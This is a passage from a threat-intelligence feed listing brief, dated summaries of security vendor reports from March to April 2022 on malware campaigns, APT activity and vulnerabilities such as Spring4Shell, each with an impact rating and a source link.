MEDIUM
Intel Source:
Trend Micro
Intel Name:
Mirai Botnet exploiting Spring4Shell Vulnerability
Date of Scan:
2022-04-11
Impact:
MEDIUM
Summary:
The Trend Micro research team has confirmed earlier reports that the new Spring4Shell vulnerability is being exploited by the Mirai botnet. The Mirai sample is downloaded to the ‘/tmp’ folder and executed after its permissions are changed with ‘chmod’ to make it executable.
Source: https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html
2022-04-11
Denonia Malware specifically targeting AWS Lambda
MEDIUM
Intel Source:
Cado security
Intel Name:
Denonia Malware specifically targeting AWS Lambda
Date of Scan:
2022-04-11
Impact:
MEDIUM
Summary:
Researchers from Cado Security published their findings on a new malware variant called 'Denonia' that targets AWS Lambda. On further investigation, the researchers found that the sample was a 64-bit ELF executable. The malware also relies on third-party GitHub libraries, including those for writing Lambda functions and retrieving data from Lambda invoke requests.
Source: https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/
2022-04-11
FFDroider Stealer Targeting Social Media Platforms
LOW
Intel Source:
Zscaler
Intel Name:
FFDroider Stealer Targeting Social Media Platforms
Date of Scan:
2022-04-11
Impact:
LOW
Summary:
Researchers from Zscaler have discovered many new types of stealer malware across different attack campaigns, including a novel Windows-based malware that creates a registry key, dubbed FFDroider, which is designed to send stolen credentials and cookies to a C&C server.
Source: https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users
2022-04-08
UAC-0010 group/Armageddon targeting Ukraine government
MEDIUM
Intel Source:
CERT-UA
Intel Name:
UAC-0010 group/Armageddon targeting Ukraine government
Date of Scan:
2022-04-08
Impact:
MEDIUM
Summary:
Ukraine’s Computer Emergency Response Team (CERT-UA) revealed on Monday a string of phishing emails that they’ve linked to a Russian state-sponsored actor called Armageddon. The attacks baited Ukrainian and Latvian government officials with information concerning the war between Ukraine and Russia.
Source: https://cert.gov.ua/article/39138 https://therecord.media/ukrainian-cert-details-russia-linked-phishing-attacks-targeting-government-officials/
2022-04-08
Remcos RAT phishing campaign
LOW
Intel Source:
Fortinet
Intel Name:
Remcos RAT phishing campaign
Date of Scan:
2022-04-08
Impact:
LOW
Summary:
Researchers from FortiGuard Labs share their analysis of the Remcos RAT, delivered by a phishing campaign and used by malicious actors to control victims’ devices.
Source: https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing
2022-04-08
Chinese APT targets Indian Power Grid
MEDIUM
Intel Source:
Recorded Future
Intel Name:
Chinese APT targets Indian Power Grid
Date of Scan:
2022-04-08
Impact:
MEDIUM
Summary:
Researchers from Recorded Future find continued targeting of the Indian power grid by a Chinese state-sponsored activity group, likely intended to enable information gathering surrounding critical infrastructure systems.
Source: https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf
2022-04-08
UAC-0010 group/Armageddon targeting European Union institutions
MEDIUM
Intel Source:
CERT-UA
Intel Name:
UAC-0010 group/Armageddon targeting European Union institutions
Date of Scan:
2022-04-08
Impact:
MEDIUM
Summary:
Ukraine’s Computer Emergency Response Team (CERT-UA) revealed on Monday a string of phishing emails that they’ve linked to a Russian state-sponsored actor called Armageddon. The attacks baited Ukrainian and Latvian government officials with information concerning the war between Ukraine and Russia.
Source: https://cert.gov.ua/article/39086 https://www.bleepingcomputer.com/news/security/ukraine-russian-armageddon-phishing-targets-eu-govt-agencies/
2022-04-08
Parrot TDS takes over compromised websites
MEDIUM
Intel Source:
Avast
Intel Name:
Parrot TDS takes over compromised websites
Date of Scan:
2022-04-08
Impact:
MEDIUM
Summary:
Avast researchers have published a report stating that a new traffic direction system (TDS) called Parrot has been spotted leveraging tens of thousands of compromised websites to launch further malicious campaigns. The TDS has infected various web servers hosting more than 16,500 websites, ranging from adult content sites and personal websites to university sites and local government sites.
Source: https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/
2022-04-08
Operation Bearded Barbie
MEDIUM
Intel Source:
Cybereason
Intel Name:
Operation Bearded Barbie
Date of Scan:
2022-04-08
Impact:
MEDIUM
Summary:
Researchers from Cybereason discovered a new APT-C-23 campaign targeting a group of high-profile Israeli targets working for sensitive defense, law enforcement and emergency services organizations. The investigation revealed that APT-C-23 has effectively upgraded its malware arsenal with new tools dubbed Barb(ie) Downloader and BarbWire Backdoor.
Source: https://www.cybereason.com/blog/operation-bearded-barbie-apt-c-23-campaign-targeting-israeli-officials#iocs
2022-04-07
Windows MetaStealer Malware
MEDIUM
Intel Source:
ISC.SANS
Intel Name:
Windows MetaStealer Malware
Date of Scan:
2022-04-07
Impact:
MEDIUM
Summary:
Researchers at SANS ISC have analysed 16 samples of Excel files submitted to VirusTotal on 30-03-2022; these Excel files are distributed as email attachments. Post-infection traffic triggers signatures for Win32/MetaStealer Related Activity.
Source: https://isc.sans.edu/diary/rss/28522
2022-04-07
Scammers are Exploiting Ukraine Donations
LOW
Intel Source:
McAfee
Intel Name:
Scammers are Exploiting Ukraine Donations
Date of Scan:
2022-04-07
Impact:
LOW
Summary:
McAfee researchers have identified malicious sites and emails used by attackers to lure internet users into a cryptocurrency donation scam.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/scammers-are-exploiting-ukraine-donations/
2022-04-07
Evolution of FIN7 group
MEDIUM
Intel Source:
Mandiant
Intel Name:
Evolution of FIN7 group
Date of Scan:
2022-04-07
Impact:
MEDIUM
Summary:
Mandiant published research on the evolution of FIN7 drawn from both historical and recent intrusions, describing the process of merging eight previously suspected UNC groups into FIN7. The researchers also highlighted notable shifts in FIN7 activity over time, including the use of novel malware, the incorporation of new initial access vectors and shifts in monetization strategies.
Source: https://www.mandiant.com/resources/evolution-of-fin7
2022-04-07
New AsyncRAT campaign features 3LOSH crypter
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
New AsyncRAT campaign features 3LOSH crypter
Date of Scan:
2022-04-07
Impact:
MEDIUM
Summary:
Cisco Talos Intelligence Group discovered that ongoing malware distribution campaigns are using ISO disk images to deliver AsyncRAT and other commodity malware to victims. They found that these campaigns appear to be linked to a new version of the 3LOSH crypter.
Source: https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html
2022-04-07
CaddyWiper Malware- New Analysis
MEDIUM
Intel Source:
Morphisec
Intel Name:
CaddyWiper Malware- New Analysis
Date of Scan:
2022-04-07
Impact:
MEDIUM
Summary:
Researchers from Morphisec share a new analysis of the CaddyWiper malware, which has surfaced as the fourth destructive wiper attacking Ukrainian infrastructure. CaddyWiper destroys user data and partition information from attached drives and has been spotted on several dozen systems in a limited number of organizations.
Source: https://blog.morphisec.com/caddywiper-analysis-new-malware-attacking-ukraine
2022-04-07
Cicada/APT10 new espionage campaign
MEDIUM
Intel Source:
Symantec
Intel Name:
Cicada/APT10 new espionage campaign
Date of Scan:
2022-04-07
Impact:
MEDIUM
Summary:
Researchers at Symantec have discovered an espionage campaign by the Chinese APT group known as APT10/Cicada. Victims identified in this campaign include government, legal, religious and non-governmental organizations (NGOs) in multiple countries around the world, including in Europe, Asia and North America.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks
2022-04-07
Malicious Word Documents Using MS Media Player
LOW
Intel Source:
ASEC
Intel Name:
Malicious Word Documents Using MS Media Player
Date of Scan:
2022-04-07
Impact:
LOW
Summary:
ASEC researchers have analysed a malicious Word file that is being distributed with text impersonating AhnLab. The Word file downloads another Word file containing a malicious VBA macro via an external URL and runs it. The downloaded Word file uses the Windows Media Player() function instead of AutoOpen() to automatically run the VBA macro.
Source: https://asec.ahnlab.com/en/33477/
2022-04-07
Colibri Loader campaign delivering the Vidar Stealer
LOW
Intel Source:
Malwarebytes
Intel Name:
Colibri Loader campaign delivering the Vidar Stealer
Date of Scan:
2022-04-07
Impact:
LOW
Summary:
Researchers from Malwarebytes recently uncovered a new Colibri Loader campaign delivering the Vidar Stealer as its final payload; the loader uses a clever persistence technique that combines Task Scheduler and PowerShell.
Source: https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/
2022-04-07
BLISTER & SocGholish loaders delivering LockBit Ransomware
MEDIUM
Intel Source:
Trend Micro
Intel Name:
BLISTER & SocGholish loaders delivering LockBit Ransomware
Date of Scan:
2022-04-07
Impact:
MEDIUM
Summary:
Researchers from Trend Micro recently discovered a campaign in which BLISTER and SocGholish, two loaders known for their evasion tactics, were used to deliver LockBit ransomware.
Source: https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html
2022-04-06
New Rat campaign leverages Tax Season
LOW
Intel Source:
Cofense
Intel Name:
New Rat campaign leverages Tax Season
Date of Scan:
2022-04-06
Impact:
LOW
Summary:
The Cofense Phishing Defense Center team has discovered a tactic that spoofs the U.S. Internal Revenue Service (IRS) to download malware onto user systems. This campaign leverages NetSupport Manager, a troubleshooting and screen control program, as a malicious remote access trojan (RAT) that the threat actor employs to remotely enter user systems.
Source: https://cofense.com/blog/rat-campaign-looks-to-take-advantage-of-the-tax-season
2022-04-06
New UAC-0056 Group activity
MEDIUM
Intel Source:
Malwarebytes
Intel Name:
New UAC-0056 Group activity
Date of Scan:
2022-04-06
Impact:
MEDIUM
Summary:
Researchers from Intezer Labs shared that UAC-0056 (TA471, SaintBear, UNC2589) has been launching targeted spear-phishing campaigns using spoofed Ukrainian governmental email addresses to deliver the Elephant malware framework, written in Go.
Source: https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/ https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/
2022-04-06
Lazarus Group New Campaign
LOW
Intel Source:
SecureList
Intel Name:
Lazarus Group New Campaign
Date of Scan:
2022-04-06
Impact:
LOW
Summary:
Researchers at Securelist have discovered that a trojanized DeFi application was used by the Lazarus Group to deliver a backdoor. The DeFi application contains a legitimate program called DeFi Wallet that saves and manages a cryptocurrency wallet, but it also implants a malicious file when executed.
Source: https://securelist.com/lazarus-trojanized-defi-app/106195/
2022-04-06
Stolen Image Evidence Campaign
MEDIUM
Intel Source:
DFIR Report
Intel Name:
Stolen Image Evidence Campaign
Date of Scan:
2022-04-06
Impact:
MEDIUM
Summary:
Researchers at The DFIR Report have identified a single Conti ransomware deployment from December that appears to be part of a larger campaign. The attack utilized IcedID, a well-known banking trojan, which was delivered via the 'Stolen Images Evidence' email campaign.
Source: https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/
2022-04-06
Mirai campaign updated its arsenal of exploits
MEDIUM
Intel Source:
Fortinet
Intel Name:
Mirai campaign updated its arsenal of exploits
Date of Scan:
2022-04-06
Impact:
MEDIUM
Summary:
Researchers at Fortinet Labs have identified that the Beastmode Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Five new exploits were added within a month, with three targeting various models of TOTOLINK routers.
Source: https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign
2022-04-05
VajraEleph (APT-Q-43) group New campaign
LOW
Intel Source:
Qianxin
Intel Name:
VajraEleph (APT-Q-43) group New campaign
Date of Scan:
2022-04-05
Impact:
LOW
Summary:
The mobile security team of the Qianxin Technology HK Co. Limited Virus Response Center identified that the VajraEleph (APT-Q-43) group has been carrying out targeted military espionage activities against the Pakistani military.
Source: https://mp.weixin.qq.com/s/B0ElRhbqLzs-wGQh79fTww
2022-04-05
Remcos Rat Phishing Campaign
MEDIUM
Intel Source:
Morphisec
Intel Name:
Remcos Rat Phishing Campaign
Date of Scan:
2022-04-05
Impact:
MEDIUM
Summary:
Morphisec Labs has detected a new wave of Remcos RAT infections being spread through phishing emails masquerading as payment remittances sent from financial institutions.
Source: https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain
2022-04-04
Mars InfoStealer new operation
MEDIUM
Intel Source:
Morphisec
Intel Name:
Mars InfoStealer new operation
Date of Scan:
2022-04-04
Impact:
MEDIUM
Summary:
The Morphisec Labs team has analysed a campaign in which the actor distributed Mars Stealer via cloned websites offering well-known software. The Morphisec team attributed this actor to a Russian national by examining the screenshots and keyboard details from the extracted system.txt.
Source: https://blog.morphisec.com/threat-research-mars-stealer
2022-04-04
Hive Ransomware leveraging IPfuscation Technique
MEDIUM
Intel Source:
SentinelOne
Intel Name:
Hive Ransomware leveraging IPfuscation Technique
Date of Scan:
2022-04-04
Impact:
MEDIUM
Summary:
Researchers at SentinelOne have discovered a new obfuscation technique used by the Hive ransomware gang, which involves IPv4 addresses and a series of conversions that eventually lead to downloading a Cobalt Strike beacon.
Source: https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/
2022-04-04
North Korea related files distributed via malicious VB Scripts
LOW
Intel Source:
ASEC
Intel Name:
North Korea related files distributed via malicious VB Scripts
Date of Scan:
2022-04-04
Impact:
LOW
Summary:
ASEC researchers have analysed phishing emails related to North Korea that carry a compressed file as an attachment. The emails refer to writing a resume in order to induce execution of the attached file. A malicious VBS script file exists inside the compressed file.
Source: https://asec.ahnlab.com/ko/33141/
2022-04-04
New PlugX variant used by Chinese APT group
MEDIUM
Intel Source:
Trellix
Intel Name:
New PlugX variant used by Chinese APT group
Date of Scan:
2022-04-04
Impact:
MEDIUM
Summary:
Researchers at Trellix have discovered a new variant of the PlugX malware named 'Talisman'. The new variant follows the usual execution process by abusing a signed, benign binary that loads a modified DLL to execute shellcode. The shellcode is used to decrypt the PlugX malware, which then serves as a backdoor with plug-in capabilities.
Source: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/plugx-a-talisman-to-behold.html
2022-04-04
Acid Rain wiper malware targets Viasat KA-SAT modems
MEDIUM
Intel Source:
SentinelOne
Intel Name:
Acid Rain wiper malware targets Viasat KA-SAT modems
Date of Scan:
2022-04-04
Impact:
MEDIUM
Summary:
SentinelLabs researchers have identified a new modem wiper, AcidRain, which has been targeting Viasat KA-SAT modems in Europe. This wiper is ELF MIPS malware designed to wipe modems and routers.
Source: https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/
2022-04-04
State sponsored groups leveraging RU-UA conflict
MEDIUM
Intel Source:
Checkpoint
Intel Name:
State sponsored groups leveraging RU-UA conflict
Date of Scan:
2022-04-04
Impact:
MEDIUM
Summary:
Researchers from Check Point provide an overview of several campaigns by different APT groups that use the ongoing Russia-Ukraine war to increase the efficiency of their campaigns. They also discuss the victimology of these campaigns and the tactics used, and provide technical analysis of the observed malicious payloads and malware specially crafted for this cyber-espionage.
Source: https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/
2022-04-04
BlackGuard - new infostealer malware
MEDIUM
Intel Source:
Zscaler
Intel Name:
BlackGuard - new infostealer malware
Date of Scan:
2022-04-04
Impact:
MEDIUM
Summary:
The Zscaler ThreatLabz team came across BlackGuard, a sophisticated stealer currently being advertised as malware-as-a-service with a monthly price of $200. Researchers share their analysis of the techniques the BlackGuard stealer uses to steal information and evade detection using obfuscation, as well as its anti-debugging techniques.
Source: https://www.zscaler.com/blogs/security-research/analysis-blackguard-new-info-stealer-malware-being-sold-russian-hacking
2022-04-01
Spoofed Invoice delivering IcedID Trojan
MEDIUM
Intel Source:
Fortinet
Intel Name:
Spoofed Invoice delivering IcedID Trojan
Date of Scan:
2022-04-01
Impact:
MEDIUM
Summary:
FortiGuard Labs encountered a spearphishing campaign targeting a fuel company in Kyiv, Ukraine. The email contains an attached zip file, which in turn contains an invoice file claiming to be from another fuel company. The IcedID trojan is dropped via main.dll in the Windows registry.
Source: https://www.fortinet.com/blog/threat-research/spoofed-invoice-drops-iced-id
2022-04-01
Spring4Shell Vulnerability
HIGH
Intel Source:
Securonix
Intel Name:
Spring4Shell Vulnerability
Date of Scan:
2022-04-01
Impact:
HIGH
Summary:
The Securonix Threat Research team has identified a currently unpatched zero-day vulnerability in Spring Core, a widely used Java-based platform with cross-platform support. Early details claim that the bug would allow full remote code execution (RCE) on affected systems.
Source: https://www.securonix.com/blog/detection-and-analysis-of-spring4shell/
2022-04-01
Deep Panda APT group exploiting Log4shell
MEDIUM
Intel Source:
Fortinet
Intel Name:
Deep Panda APT group exploiting Log4shell
Date of Scan:
2022-04-01
Impact:
MEDIUM
Summary:
FortiGuard Labs detected an opportunistic campaign by the Chinese nation-state “Deep Panda” APT group exploiting the Log4Shell vulnerability in VMware Horizon servers belonging to the financial, academic, cosmetics and travel industries.
Source: https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits
2022-03-31
Multiple APT groups targeting Eastern Europe
MEDIUM
Intel Source:
Google
Intel Name:
Multiple APT groups targeting Eastern Europe
Date of Scan:
2022-03-31
Impact:
MEDIUM
Summary:
Google TAG researchers have tracked three APT groups targeting government and military organisations in Ukraine, Kazakhstan and Mongolia, as well as NATO forces in Eastern Europe. All three APT groups are conducting phishing campaigns against these targets.
Source: https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/
2022-03-31
Transparent Tribe targets Indian government and military
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
Transparent Tribe targets Indian government and military
Date of Scan:
2022-03-31
Impact:
MEDIUM
Summary:
Cisco Talos researchers have identified a new campaign by Transparent Tribe targeting Indian government and military bodies. The threat actor is leveraging CrimsonRAT to infect victims.
Source: https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html
2022-03-31
Verblecon - A New Malware Loader
LOW
Intel Source:
Symantec
Intel Name:
Verblecon - A New Malware Loader
Date of Scan:
2022-03-31
Impact:
LOW
Summary:
Symantec researchers have identified malware named Trojan.Verblecon, which is being leveraged in attacks whose end goal appears to be installing cryptocurrency miners on infected machines. However, the capabilities of this malware indicate that it could be highly dangerous if leveraged in ransomware or espionage campaigns.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/verblecon-sophisticated-malware-cryptocurrency-mining-discord
2022-03-31
Chromium Based Browser Vulnerability
MEDIUM
Intel Source:
Google
Intel Name:
Chromium Based Browser Vulnerability
Date of Scan:
2022-03-31
Impact:
MEDIUM
Summary:
Google is urging users on Windows, macOS and Linux to update Chrome builds to version 99.0.4844.84 following the discovery of a vulnerability that has an exploit in the wild.
Source: https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html
2022-03-30
Kimsuky distributing VB Script disguised as PDF Files
LOW
Intel Source:
ASEC
Intel Name:
Kimsuky distributing VB Script disguised as PDF Files
Date of Scan:
2022-03-30
Impact:
LOW
Summary:
ASEC researchers have identified APT attacks by a group called Kimsuky using VB Script disguised as PDF files. Upon running the script file with the VBS extension, the malware opens the innocuous PDF file embedded within it to trick the user into thinking they opened a harmless document, and uses a malicious DLL file to leak information.
Source: https://asec.ahnlab.com/en/33032/
2022-03-30
BitRAT malware disguised as office Installer
LOW
Intel Source:
ASEC
Intel Name:
BitRAT malware disguised as office Installer
Date of Scan:
2022-03-30
Impact:
LOW
Summary:
ASEC researchers have analysed a BitRAT malware sample that is being distributed as an Office installer bundled with different files. The malware is being actively distributed via file-sharing websites such as Korean webhards.
Source: https://asec.ahnlab.com/en/33024/
2022-03-30
Emotet New IoC and New Pattern
MEDIUM
Intel Source:
Cisco
Intel Name:
Emotet New IoC and New Pattern
Date of Scan:
2022-03-30
Impact:
MEDIUM
Summary:
Cisco conducted research to find new Emotet IOCs and URL patterns related to the new wave of Emotet activity since its re-emergence in November 2021. Cisco researchers summarize the Emotet (Geodo/Heodo) malware threat, its lifecycle and typical detectable patterns.
Source: https://blogs.cisco.com/security/emotet-is-back
2022-03-29
New Conversation Hijacking Campaign Delivering IcedID
MEDIUM
Intel Source:
Intezer
Intel Name:
New Conversation Hijacking Campaign Delivering IcedID
Date of Scan:
2022-03-29
Impact:
MEDIUM
Summary:
Researchers from Intezer provide a technical analysis of a new campaign that initiates attacks with a phishing email using conversation hijacking to deliver the IcedID malware.
Source: https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/
2022-03-29
Purple Fox using New variant of FatalRat
MEDIUM
Intel Source:
Trend Micro
Intel Name:
Purple Fox using New variant of FatalRat
Date of Scan:
2022-03-29
Impact:
MEDIUM
Summary:
Trend Micro Research has been tracking a threat actor named 'Purple Fox' and its activities. Researchers identified Purple Fox’s new arrival vector and the early-access loaders they believe are associated with the intrusion set behind this botnet. The operators are updating their arsenal with new malware, including a variant of the remote access trojan FatalRAT that they seem to be continuously upgrading.
Source: https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html
2022-03-28
Muhstik Gang targets Redis Servers
MEDIUM
Intel Source:
Juniper
Intel Name:
Muhstik Gang targets Redis Servers
Date of Scan:
2022-03-28
Impact:
MEDIUM
Summary:
Researchers at Juniper Threat Labs have revealed an attack that targets Redis servers using a recently disclosed vulnerability, CVE-2022-0543. This vulnerability exists in some Redis Debian packages. The payload used is a variant of the Muhstik bot that can be used to launch DDoS attacks.
Source: https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers
2022-03-28
Conti Ransomware new update
MEDIUM
Intel Source:
Zscaler
Intel Name:
Conti Ransomware new update
Date of Scan:
2022-03-28
Impact:
MEDIUM
Summary:
Researchers at Zscaler ThreatLabz have been following the Conti ransomware group and, as part of their global ransomware tracking efforts, identified an updated version of Conti ransomware that includes improved file encryption, introduces techniques to better evade security software and streamlines the ransom payment process.
Source: https://www.zscaler.com/blogs/security-research/conti-ransomware-attacks-persist-updated-version-despite-leaks
2022-03-25
Tax Season and Refugee war scams delivering Emotet
MEDIUM
Intel Source:
Fortinet
Intel Name:
Tax Season and Refugee war scams delivering Emotet
Date of Scan:
2022-03-25
Impact:
MEDIUM
Summary:
The FortiGuard Labs Research team has analysed emails related to tax season and the Ukrainian conflict. The phishing emails are attributed to the infamous 'Emotet' malware, which affects the Windows platform; compromised machines fall under the control of the threat actor, leading to theft of personally identifiable information (PII), credential theft, monetary loss, etc.
Source: https://www.fortinet.com/blog/threat-research/bad-actors-capitalize-current-events-email-scams
2022-03-25
JSSLoader RAT delivered through XLL Files
LOW
Intel Source:
Morphisec
Intel Name:
JSSLoader RAT delivered through XLL Files
Date of Scan:
2022-03-25
Impact:
LOW
Summary:
Morphisec Labs has discovered a new variant of the JSSLoader RAT. JSSLoader is a small but very capable .NET remote access trojan (RAT). Its capabilities include data exfiltration, persistence, auto-updating, additional payload delivery and more. Moreover, attackers are now using .XLL files to deliver an obfuscated version of JSSLoader.
Source: https://blog.morphisec.com/new-jssloader-trojan-delivered-through-xll-files
2022-03-25
Operation Dragon Castling
LOW
Intel Source:
Avast
Intel Name:
Operation Dragon Castling
Date of Scan:
2022-03-25
Impact:
LOW
Summary:
Researchers from Avast found an APT campaign dubbed Operation Dragon Castling, which has been targeting betting companies in Southeast Asian countries. The campaign has similarities with several old malware samples used by an unspecified Chinese-speaking APT group.
Source: https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies/
2022-03-25
Chinese APT Scarab targets Ukraine
MEDIUM
Intel Source:
SentinelOne
Intel Name:
Chinese APT Scarab targets Ukraine
Date of Scan:
2022-03-25
Impact:
MEDIUM
Summary:
Researchers at SentinelLabs have further analysed alert #4244, released by the Ukrainian CERT on 22 March 2022, which describes the malicious activity of the UAC-0026 threat group. The SentinelLabs team has attributed UAC-0026 to the Chinese APT group known as Scarab.
Source: https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/
2022-03-24
Crypto Phishing
LOW
Intel Source:
Confiant
Intel Name:
Crypto Phishing
Date of Scan:
2022-03-24
Impact:
LOW
Summary:
Researchers at Confiant have looked at several chains that start with an ad and end in cryptocurrency theft, usually via phishing.
Source: https://blog.confiant.com/a-whirlwind-tour-of-crypto-phishing-8628da0a9e38
2022-03-24
Operation DreamJob and AppleJeus
MEDIUM
Intel Source:
Google
Intel Name:
Operation DreamJob and AppleJeus
Date of Scan:
2022-03-24
Impact:
MEDIUM
Summary:
Researchers from Google discovered two North Korean government-backed threat actors exploiting a remote code execution vulnerability in Chrome, CVE-2022-0609. These groups' activity has been publicly tracked as Operation Dream Job and Operation AppleJeus. These campaigns have been targeting U.S.-based organizations.
Source: https://blog.google/threat-analysis-group/countering-threats-north-korea/
2022-03-24
New variants of Arkei Stealer
LOW
Intel Source:
ISC.SANS
Intel Name:
New variants of Arkei Stealer
Date of Scan:
2022-03-24
Impact:
LOW
Summary:
Researchers at the SANS ISC InfoSec Diary have analysed the Vidar, Oski and Mars Stealer variants of the Arkei Stealer malware. They also found that legitimate DLL files used by the Vidar, Oski and Mars variants are hosted on the same C2 server.
Source: https://isc.sans.edu/diary.html?date=2022-03-23
2022-03-24
Vidar Malware hidden in Microsoft Help file
MEDIUM
Intel Source:
Trustwave
Intel Name:
Vidar Malware hidden in Microsoft Help file
Date of Scan:
2022-03-24
Impact:
MEDIUM
Summary:
Trustwave SpiderLabs researchers have detected a Vidar malware phishing campaign that abuses Microsoft HTML Help files. Vidar is Windows spyware and an information stealer available for purchase by cybercriminals. Vidar can harvest OS and user data, online service and cryptocurrency account credentials, and credit card information.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vidar-malware-launcher-concealed-in-help-file/
2022-03-24
Conti Ransomware Affiliate Exposed
MEDIUM
Intel Source:
eSentire
Intel Name:
Conti Ransomware Affiliate Exposed
Date of Scan:
2022-03-24
Impact:
MEDIUM
Summary:
Researchers at eSentire have been tracking the movements of the Conti gang for over two years and are now publishing a new set of indicators currently being used by a Conti affiliate. The analysis also focuses on the infrastructure used by the gang.
Source: https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire
2022-03-24
Arid Viper using Arid Gopher malware
MEDIUM
Intel Source:
deepinstinct
Intel Name:
Arid Viper using Arid Gopher malware
Date of Scan:
2022-03-24
Impact:
MEDIUM
Summary:
Researchers from Deep Instinct's Threat Research team discovered a never-before-seen Micropsia malware variant dubbed Arid Gopher, which is attributed to Arid Viper.
Source: https://www.deepinstinct.com/blog/arid-gopher-the-newest-micropsia-malware-variant
2022-03-24
Meris and TrickBot joined Hands
MEDIUM
Intel Source:
Avast
Intel Name:
Meris and TrickBot joined Hands
Date of Scan:
2022-03-24
Impact:
MEDIUM
Summary:
According to Avast researchers, the Meris backdoor and TrickBot have joined hands. The botnet is known to exploit a known vulnerability in the Winbox component of MikroTik routers (CVE-2018-14847), enabling the attackers to gain unauthenticated remote administrative access to any affected device.
Source: https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/
2022-03-24
Midas Ransomware - A Thanos Ransomware variant
LOW
Intel Source:
Zscaler
Intel Name:
Midas Ransomware - A Thanos Ransomware variant
Date of Scan:
2022-03-24
Impact:
LOW
Summary:
Researchers at Zscaler have analysed variants of Thanos ransomware and identified a shift in the ransomware's tactics in 2021. Thanos ransomware was first identified in February 2020 as a RaaS on the dark web. In 2021 the Thanos source code was leaked, after which many variants have been identified by researchers. One of the latest variants is Midas.
Source: https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants
2022-03-24
Password stealer disguised as private Fortnite server
LOW
Intel Source:
Avast
Intel Name:
Password stealer disguised as private Fortnite server
Date of Scan:
2022-03-24
Impact:
LOW
Summary:
Researchers at Avast have identified password-stealing malware disguised as a private Fortnite server where users can meet for a private match and use skins for free. The malware is being heavily propagated on the communications platform Discord.
Source: https://blog.avast.com/password-stealer-disguised-as-fortnite-server-spreading-on-discord
2022-03-23
Mustang Panda deploying new Hodur Malware
MEDIUM
Intel Source:
WeLiveSecurity
Intel Name:
Mustang Panda deploying new Hodur Malware
Date of Scan:
2022-03-23
Impact:
MEDIUM
Summary:
Researchers from ESET have discovered a new cyber espionage campaign in which the China-linked APT group Mustang Panda was deploying Hodur malware. The victims are in East and Southeast Asia.
Source: https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/
2022-03-23
Phishing Campaign using QR code targets Ukraine
MEDIUM
Intel Source:
CERT-UA
Intel Name:
Phishing Campaign using QR code targets Ukraine
Date of Scan:
2022-03-23
Impact:
MEDIUM
Summary:
CERT-UA discovered the distribution of e-mails that mimic messages from UKR.NET and contain a QR code encoding a URL created with a URL-shortener service; the activity was attributed with low confidence to APT28.
Source: https://cert.gov.ua/article/37788
2022-03-23
Document-borne APT attack targeting Carbon emissions companies
LOW
Intel Source:
ASEC
Intel Name:
Document-borne APT attack targeting Carbon emissions companies
Date of Scan:
2022-03-23
Impact:
LOW
Summary:
The ASEC team has analysed a malicious Word document titled '**** Carbon Credit Institution.doc', which the user downloaded through a web browser. The team identified the malicious document from the logs collected by their Smart Defense tool. The document carries macro code, and it is likely that its internal macro code runs wscript.ex.
Source: https://asec.ahnlab.com/en/32822/
2022-03-23
ClipBanker Malware disguised as Malware Creation Tool
LOW
Intel Source:
ASEC
Intel Name:
ClipBanker Malware disguised as Malware Creation Tool
Date of Scan:
2022-03-23
Impact:
LOW
Summary:
The ASEC team has identified ClipBanker malware disguised as a malware creation tool. ClipBanker monitors the clipboard of the infected system and, if a coin wallet address string is copied, changes it to the address designated by the attacker.
Source: https://asec.ahnlab.com/en/32825/
2022-03-23
Vermin (UAC-0020) targets Ukraine Govt using Spectr malware
MEDIUM
Intel Source:
CERT-UA
Intel Name:
Vermin (UAC-0020) targets Ukraine Govt using Spectr malware
Date of Scan:
2022-03-23
Impact:
MEDIUM
Summary:
On March 17, CERT-UA found an active spear-phishing campaign delivering SPECTR malware. The campaign was initiated by Vermin, aka UAC-0020, who are associated with the Luhansk People’s Republic (LPR).
